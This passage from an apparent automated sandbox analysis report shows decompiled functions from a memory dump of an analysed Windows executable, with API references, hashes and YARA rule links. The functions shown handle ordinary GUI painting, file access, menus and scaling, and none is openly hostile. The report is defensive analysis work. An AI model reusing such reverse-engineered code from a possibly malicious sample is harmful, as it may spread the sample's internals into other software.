								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00437760(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                                                        0x0043aadc
                                                                        0x0043aadf
                                                                        0x0043aae1
                                                                        0x0043aae3
                                                                        0x0043aaec
                                                                        0x0043ab0a
                                                                        0x0043ab0a
                                                                        0x0043ab0d
                                                                        0x0043ab15
                                                                        0x0043abfa
                                                                        0x0043abfa
                                                                        0x0043ac02
                                                                        0x0043ad07
                                                                        0x0043ad07
                                                                        0x0043ad07
                                                                        0x0043ac0b
                                                                        0x0043ac0e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043ac15
                                                                        0x0043ac19
                                                                        0x0043ac1b
                                                                        0x0043ac23
                                                                        0x0043ac28
                                                                        0x0043ac31
                                                                        0x0043ac6b
                                                                        0x0043ac8e
                                                                        0x0043ac99
                                                                        0x0043aca3
                                                                        0x0043acb8
                                                                        0x0043acdb
                                                                        0x0043ace6
                                                                        0x0043acf0
                                                                        0x0043acf0
                                                                        0x0043acf5
                                                                        0x0043acf6
                                                                        0x0043acf6
                                                                        0x0043acf6
                                                                        0x00000000
                                                                        0x0043ac1b
                                                                        0x0043ab1b
                                                                        0x0043ab1f
                                                                        0x0043ab28
                                                                        0x0043ab2c
                                                                        0x0043ab2e
                                                                        0x0043ab2e
                                                                        0x0043ab2c
                                                                        0x0043ab39
                                                                        0x0043ab3f
                                                                        0x0043ab45
                                                                        0x0043ab52
                                                                        0x0043ab58
                                                                        0x0043ab86
                                                                        0x0043ab98
                                                                        0x0043ab9e
                                                                        0x0043aba0
                                                                        0x0043aba0
                                                                        0x0043abac
                                                                        0x0043abb8
                                                                        0x0043abca
                                                                        0x0043abda
                                                                        0x0043abe5
                                                                        0x0043abea
                                                                        0x0043abea
                                                                        0x0043ab98
                                                                        0x0043abf0
                                                                        0x0043abf1
                                                                        0x0043ab45

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                        • String ID:
                                                                        • API String ID: 375863564-0
                                                                        • Opcode ID: a339bbe9dbde8620f25859f2c879bc2d89aaec14b1b7b84054d5a770207a83ca
                                                                        • Instruction ID: 0b65945d901311baf0f71d7817378dc12ba5f118a77a7d6de250862080b77c6d
                                                                        • Opcode Fuzzy Hash: a339bbe9dbde8620f25859f2c879bc2d89aaec14b1b7b84054d5a770207a83ca
                                                                        • Instruction Fuzzy Hash: A4516F712042449FD714DF29C8C4B5B77E9AF88308F04445EFE86CB296D639E891CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402B40, Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E00402B40(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a94;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402AD4;
				}
				_t59[9] = E00402B20;
				_t59[8] = E00402AD0;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402AD0;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x4963e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402AD4;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                        0x00402b41
                                                                        0x00402b45
                                                                        0x00402b48
                                                                        0x00402b54
                                                                        0x00402b61
                                                                        0x00402b66
                                                                        0x00402b6b
                                                                        0x00402b70
                                                                        0x00402b56
                                                                        0x00402b57
                                                                        0x00402b79
                                                                        0x00402b7e
                                                                        0x00402b83
                                                                        0x00402b59
                                                                        0x00402b5a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402b8a
                                                                        0x00402b8f
                                                                        0x00402b94
                                                                        0x00402b94
                                                                        0x00402b99
                                                                        0x00402b99
                                                                        0x00402ba0
                                                                        0x00402ba7
                                                                        0x00402bb2
                                                                        0x00402c70
                                                                        0x00402c77
                                                                        0x00402c7e
                                                                        0x00402c87
                                                                        0x00402c93
                                                                        0x00402c99
                                                                        0x00402c95
                                                                        0x00402c95
                                                                        0x00402c95
                                                                        0x00402c89
                                                                        0x00402c89
                                                                        0x00402c89
                                                                        0x00402c9b
                                                                        0x00402ca3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402ca5
                                                                        0x00000000
                                                                        0x00402bb8
                                                                        0x00402bc8
                                                                        0x00402bd0
                                                                        0x00402cde
                                                                        0x00402cde
                                                                        0x00000000
                                                                        0x00402ce4
                                                                        0x00402bd6
                                                                        0x00402bde
                                                                        0x00402ca7
                                                                        0x00402cad
                                                                        0x00402cc6
                                                                        0x00000000
                                                                        0x00402cc6
                                                                        0x00402cb1
                                                                        0x00402cb8
                                                                        0x00402ccc
                                                                        0x00402cd1
                                                                        0x00000000
                                                                        0x00402cd7
                                                                        0x00402cbd
                                                                        0x00402cbf
                                                                        0x00402cbf
                                                                        0x00000000
                                                                        0x00402cbd
                                                                        0x00402be4
                                                                        0x00402bf1
                                                                        0x00402bf2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402bf8
                                                                        0x00402bfd
                                                                        0x00402bff
                                                                        0x00402bff
                                                                        0x00402c0e
                                                                        0x00000000
                                                                        0x00402c14
                                                                        0x00402c29
                                                                        0x00402c2e
                                                                        0x00402c30
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402c36
                                                                        0x00402c38
                                                                        0x00402c44
                                                                        0x00402c58
                                                                        0x00000000
                                                                        0x00402c68
                                                                        0x00000000
                                                                        0x00402c68
                                                                        0x00402c58
                                                                        0x00402c46
                                                                        0x00402c46
                                                                        0x00000000
                                                                        0x00402c38
                                                                        0x00402c0e

                                                                        APIs
                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC8
                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BEC
                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402C08
                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C29
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C52
                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C60
                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00402C9B
                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00402CB1
                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CCC
                                                                        • GetLastError.KERNEL32(000000F5), ref: 00402CE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                        • String ID:
                                                                        • API String ID: 1694776339-0
                                                                        • Opcode ID: 9aee0fbc78375ed4c045fe708eee76b85e86ea9ef32a4d9543f669cd10d059a6
                                                                        • Instruction ID: 72d0798c9f897f459679b6debe79a3b22e66610cb6c7dbc6d0f179f518ddef03
                                                                        • Opcode Fuzzy Hash: 9aee0fbc78375ed4c045fe708eee76b85e86ea9ef32a4d9543f669cd10d059a6
                                                                        • Instruction Fuzzy Hash: 07418270108700AAF7309F248B0D72B76A5EB00754F248E3FE096BA6E0D6FDA885975D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00451F78, Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00451F78(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043CC2C( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                                                        0x00451f7f
                                                                        0x00451f89
                                                                        0x00451f92
                                                                        0x00451f9c
                                                                        0x00451fa5
                                                                        0x00451faf
                                                                        0x00451fc8
                                                                        0x00451fd7
                                                                        0x00451fe1
                                                                        0x00451fee
                                                                        0x00451ffb
                                                                        0x00452008
                                                                        0x00452015
                                                                        0x00452022
                                                                        0x00000000
                                                                        0x0045202f
                                                                        0x00452043
                                                                        0x0045204d
                                                                        0x0045204d
                                                                        0x00452055
                                                                        0x0045205f
                                                                        0x00000000
                                                                        0x00452069
                                                                        0x0045205f
                                                                        0x00451faf
                                                                        0x00451f9c
                                                                        0x00452070

                                                                        APIs
                                                                        • GetSystemMenu.USER32(00000000,00000000), ref: 00451FC3
                                                                        • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451FE1
                                                                        • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451FEE
                                                                        • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451FFB
                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00452008
                                                                        • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00452015
                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00452022
                                                                        • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045202F
                                                                        • EnableMenuItem.USER32 ref: 0045204D
                                                                        • EnableMenuItem.USER32 ref: 00452069
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$Delete$EnableItem$System
                                                                        • String ID:
                                                                        • API String ID: 3985193851-0
                                                                        • Opcode ID: 9e79a2f5eae3ced763728648782822ab3c69376b2aa35a37c87e7f7102866a52
                                                                        • Instruction ID: bab5879344c1d3096d848326a20f741e7fadc53448dec7e96ea0f2bec2258502
                                                                        • Opcode Fuzzy Hash: 9e79a2f5eae3ced763728648782822ab3c69376b2aa35a37c87e7f7102866a52
                                                                        • Instruction Fuzzy Hash: 0F214F703413047AE730AA64CD8EF5A7BE95F05B19F1540A6BA097F2D3C6F9B990861C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00433F38, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 139threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E00433F38(intOrPtr __eax, void* __ecx, char _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				void* _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr _t111;
				intOrPtr _t113;
				struct HWND__* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;

				_t103 = __ecx;
				_t102 = __eax;
				_v5 = 1;
				_t2 =  &_a4; // 0x434259
				_t114 = E00434370( *_t2 + 0xfffffff7);
				_v24 = _t114;
				_t53 = GetWindow(_t114, 4);
				_t105 =  *0x495ad0; // 0x496c04
				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t115 = _t102;
					while(1) {
						_t55 =  *((intOrPtr*)(_t115 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t115 = _t55;
					}
					_t113 = E0043CC2C(_t115);
					_v28 = _t113;
					if(_t113 == _v24) {
						goto L25;
					}
					_t12 =  &_a4; // 0x434259
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
					if(_t60 == 0) {
						_t18 =  &_a4; // 0x434259
						_t107 =  *0x4323f0; // 0x43243c
						__eflags = E00403768( *((intOrPtr*)( *_t18 - 0x10)), _t107);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t20 =  &_a4; // 0x434259
							_v32 = E0043CC2C( *((intOrPtr*)( *_t20 - 0x10)));
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						EnumThreadWindows(GetCurrentThreadId(), E00433ECC,  &_v32);
						_t127 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004037D8(_t102, _t127);
						_t79 =  *0x496b8c; // 0x0
						_t111 =  *0x4311cc; // 0x431218
						if(E00403768(_t79, _t111) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t85 =  *0x496b8c; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t87 =  *0x496b8c; // 0x0
						if(E0043CC2C( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t117 = _t60;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t94 == 0) {
							break;
						}
						_t117 = _t94;
					}
					_v32 = E0043CC2C(_t117);
					goto L19;
				}
				_t118 = E004334C0(_v24, _t103);
				if(_t118 == 0) {
					goto L25;
				} else {
					while(1) {
						_t99 =  *((intOrPtr*)(_t118 + 0x30));
						if(_t99 == 0) {
							break;
						}
						_t118 = _t99;
					}
					_v24 = E0043CC2C(_t118);
					goto L6;
				}
			}































                                                                        0x00433f38
                                                                        0x00433f41
                                                                        0x00433f43
                                                                        0x00433f47
                                                                        0x00433f52
                                                                        0x00433f54
                                                                        0x00433f5a
                                                                        0x00433f5f
                                                                        0x00433f6a
                                                                        0x00433f93
                                                                        0x00433f97
                                                                        0x004340c6
                                                                        0x004340cf
                                                                        0x004340cf
                                                                        0x00433f9d
                                                                        0x00433fa3
                                                                        0x00433fa3
                                                                        0x00433fa8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433fa1
                                                                        0x00433fa1
                                                                        0x00433fb1
                                                                        0x00433fb3
                                                                        0x00433fb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433fbf
                                                                        0x00433fc5
                                                                        0x00433fca
                                                                        0x00433fe8
                                                                        0x00433fee
                                                                        0x00433ff9
                                                                        0x00433ffb
                                                                        0x0043400d
                                                                        0x0043400f
                                                                        0x00433ffd
                                                                        0x00433ffd
                                                                        0x00434008
                                                                        0x00434008
                                                                        0x00434012
                                                                        0x00434012
                                                                        0x00434016
                                                                        0x0043401c
                                                                        0x00434022
                                                                        0x00434034
                                                                        0x00434039
                                                                        0x0043403d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043404b
                                                                        0x00434056
                                                                        0x0043405b
                                                                        0x0043406b
                                                                        0x00434070
                                                                        0x00434075
                                                                        0x00434082
                                                                        0x004340ad
                                                                        0x004340c0
                                                                        0x004340c2
                                                                        0x004340c2
                                                                        0x00000000
                                                                        0x004340c0
                                                                        0x00434084
                                                                        0x00434093
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434095
                                                                        0x004340ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004340ab
                                                                        0x00433fcf
                                                                        0x00433fd5
                                                                        0x00433fd5
                                                                        0x00433fda
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433fd3
                                                                        0x00433fd3
                                                                        0x00433fe3
                                                                        0x00000000
                                                                        0x00433fe3
                                                                        0x00433f74
                                                                        0x00433f78
                                                                        0x00000000
                                                                        0x00433f7e
                                                                        0x00433f82
                                                                        0x00433f82
                                                                        0x00433f87
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433f80
                                                                        0x00433f80
                                                                        0x00433f90
                                                                        0x00000000
                                                                        0x00433f90

                                                                        APIs
                                                                          • Part of subcall function 00434370: WindowFromPoint.USER32(YBC,?,00000000,00433F52,?,-0000000C,?), ref: 00434376
                                                                          • Part of subcall function 00434370: GetParent.USER32(00000000), ref: 0043438D
                                                                        • GetWindow.USER32(00000000,00000004), ref: 00433F5A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0043402E
                                                                        • EnumThreadWindows.USER32(00000000,00433ECC,?), ref: 00434034
                                                                        • GetWindowRect.USER32 ref: 0043404B
                                                                        • IntersectRect.USER32 ref: 004340B9
                                                                          • Part of subcall function 004334C0: GlobalFindAtomA.KERNEL32 ref: 004334D4
                                                                          • Part of subcall function 004334C0: GetPropA.USER32 ref: 004334EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$RectThread$AtomCurrentEnumFindFromGlobalIntersectParentPointPropWindows
                                                                        • String ID: <$C$YBC$YBC
                                                                        • API String ID: 3421286612-525053330
                                                                        • Opcode ID: 67c238a949be0a3692a05650b6b0dd3817a18a1ea391561a0b0d11e4fad90527
                                                                        • Instruction ID: c79d42cd8e63d5d6ca071abcab3a340e76f0d134036ba66e97feda9ca407d93a
                                                                        • Opcode Fuzzy Hash: 67c238a949be0a3692a05650b6b0dd3817a18a1ea391561a0b0d11e4fad90527
                                                                        • Instruction Fuzzy Hash: 4D516D75B00209AFCB10DF69C484AAEB7F4AF48358F105566F914EB391D739EE01CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004361C8, Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004361C8(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x436374; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x43636c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x436374; // 0x0
				if(_t113 != (_t107 &  *0x436370)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x436374; // 0x0
				if(_t114 != (_t107 &  *0x436378)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041F704( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041F6E8( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                                        0x004361cf
                                                                        0x004361d2
                                                                        0x004361d4
                                                                        0x004361d9
                                                                        0x00436356
                                                                        0x00436356
                                                                        0x0043635b
                                                                        0x00436368
                                                                        0x00436368
                                                                        0x004361e3
                                                                        0x004361ed
                                                                        0x004361e5
                                                                        0x004361e5
                                                                        0x004361e5
                                                                        0x004361f6
                                                                        0x0043620a
                                                                        0x004361f8
                                                                        0x00436206
                                                                        0x00436206
                                                                        0x00436210
                                                                        0x00436229
                                                                        0x00436212
                                                                        0x00436220
                                                                        0x00436220
                                                                        0x00436230
                                                                        0x0043626a
                                                                        0x0043626d
                                                                        0x00436238
                                                                        0x0043623b
                                                                        0x0043625f
                                                                        0x00436264
                                                                        0x0043623d
                                                                        0x0043624e
                                                                        0x00436250
                                                                        0x00436250
                                                                        0x0043623b
                                                                        0x00436274
                                                                        0x00436279
                                                                        0x004362bd
                                                                        0x00436281
                                                                        0x00436289
                                                                        0x004362b4
                                                                        0x0043628b
                                                                        0x004362a0
                                                                        0x004362a0
                                                                        0x00436289
                                                                        0x004362d5
                                                                        0x004362e3
                                                                        0x004362eb
                                                                        0x004362fe
                                                                        0x004362fe
                                                                        0x0043630c
                                                                        0x00436314
                                                                        0x00436327
                                                                        0x00436327
                                                                        0x00436331
                                                                        0x00436351
                                                                        0x00436351
                                                                        0x00000000

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436201
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 0043621B
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436249
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 0043625F
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436297
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 004362AF
                                                                        • MulDiv.KERNEL32(?,?,0000001F), ref: 004362F9
                                                                        • MulDiv.KERNEL32(?,?,0000001F), ref: 00436322
                                                                        • MulDiv.KERNEL32(00000000,?,0000001F), ref: 00436348
                                                                          • Part of subcall function 0041F704: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F711
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
